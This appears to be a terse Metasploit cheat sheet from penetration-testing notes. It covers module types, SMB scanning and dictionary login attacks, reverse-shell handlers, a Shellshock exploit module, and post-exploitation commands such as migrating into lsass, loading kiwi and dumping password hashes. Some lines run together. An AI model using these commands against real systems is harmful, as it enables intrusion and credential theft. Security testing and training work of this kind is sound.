Modules
- Auxiliary scanners, crawlers and fuzzers
- Encoders encode payloads
- Evasion prepare payloads to circumvent signature based malware detection
- NOPs various architectures
- Payloads to run on target systems
- Singles, inline payloads, for example generic/shell_reverse_tcp
- Stagers, downloads the stages payloads
- Stages, for example windows/x64/shell/reverse_tcp
- Post postexploitation
Notes
search type:auxiliary <stuff>
- Send exploit to background
check if target is vulnerablesetg sets variables globallyunset payload- Flush via
unset all
Sessions
background or ctrl+z- Foreground via
sessions -i <number>
Scanning
- UDP Sweep via
scanner/discovery/udp_sweep
- SMB Scan via
scanner/smb/smb_version and smb_enumshares
- SMB login dictionary attack
scanner/smb/smb_login
- NetBios via
scanner/netbios/nbname
- HTTP version
scanner/http/http_version
Database
- Start postgres
msfdb initdb_status- Separate
workspace -a <projectname>
- Safe scans via
db_nmap
- Show
hosts
- Show
services
- Set RHOST values via
hosts -R
Exploits
show targetsshow payloads
Reverse Shells
- Multihandler, set options
use exploit/multi/handler
set payload <payloadhandler>
use multi/http/apache_mod_cgi_bash_env_exec
Post Exploitation
load kiwiload python- Windows
- list SAM database
sh
migrate <lsass.exe-PID>
hashdump
- enum shares
sh
post/windows/gather/enum_shares
- Linux
use post/linux/gather/hashdump
Other Meterpreter stuff
- Staged and in disguise running as another servicename
- Attempt to elevate privileges
- Use
multi/handler or exploit and get an overview via show payloads
- UserID via
getuid
Social_engineering